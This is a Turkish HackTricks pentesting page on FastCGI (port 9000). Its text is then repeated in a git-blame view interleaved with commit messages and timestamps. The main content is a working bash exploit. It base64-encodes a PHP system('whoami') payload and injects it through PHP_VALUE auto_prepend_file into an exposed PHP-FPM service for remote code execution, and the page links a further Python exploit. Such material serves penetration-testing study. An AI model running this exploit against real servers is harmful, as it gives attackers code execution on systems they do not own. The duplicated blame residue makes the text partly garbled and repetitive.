hacktricks/network-services-pentesting/9000-pentesting-fastcgi.md

{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks'i Destekleyin</summary>

* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.

</details>
{% endhint %}


# Temel Bilgiler

Eğer **FastCGI nedir** öğrenmek istiyorsanız, aşağıdaki sayfayı kontrol edin:

{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %}
[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)
{% endcontent-ref %}

Varsayılan olarak **FastCGI** **port** **9000**'de çalışır ve nmap tarafından tanınmaz. **Genellikle** FastCGI sadece **localhost**'ta dinler.

# RCE

FastCGI'nin rastgele kod çalıştırmasını sağlamak oldukça kolaydır:
```bash
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done
```
ve aşağıdaki python betiğini de kullanabilirsiniz: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)


{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks'i Destekleyin</summary>

* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.

</details>
{% endhint %}
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								{% hint style="success" %}
 								AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								<summary>HackTricks'i Destekleyin</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
 								* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								# Temel Bilgiler
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								Eğer **FastCGI nedir** öğrenmek istiyorsanız, aşağıdaki sayfayı kontrol edin:
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %}
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								Varsayılan olarak **FastCGI** **port** **9000**'de çalışır ve nmap tarafından tanınmaz. **Genellikle** FastCGI sadece **localhost**'ta dinler.
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								# RCE
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								FastCGI'nin rastgele kod çalıştırmasını sağlamak oldukça kolaydır:
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
+								```bash
 								#!/bin/bash
 								PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
 								FILENAMES="/var/www/public/index.php" # Exisiting file path
 								HOST=$1
 								B64=$(echo "$PAYLOAD"|base64)
 								for FN in $FILENAMES; do
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								OUTPUT=$(mktemp)
 								env -i \
 								PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
 								SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
 								cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								cat $OUTPUT
-												GitBook: [master] 2 pages modified
											
										
										
											2021-01-06 17:11:57 +00:00
+								done
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								ve aşağıdaki python betiğini de kullanabilirsiniz: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								{% hint style="success" %}
 								AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								<summary>HackTricks'i Destekleyin</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
 								* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 04:38:46 +00:00
+								{% endhint %}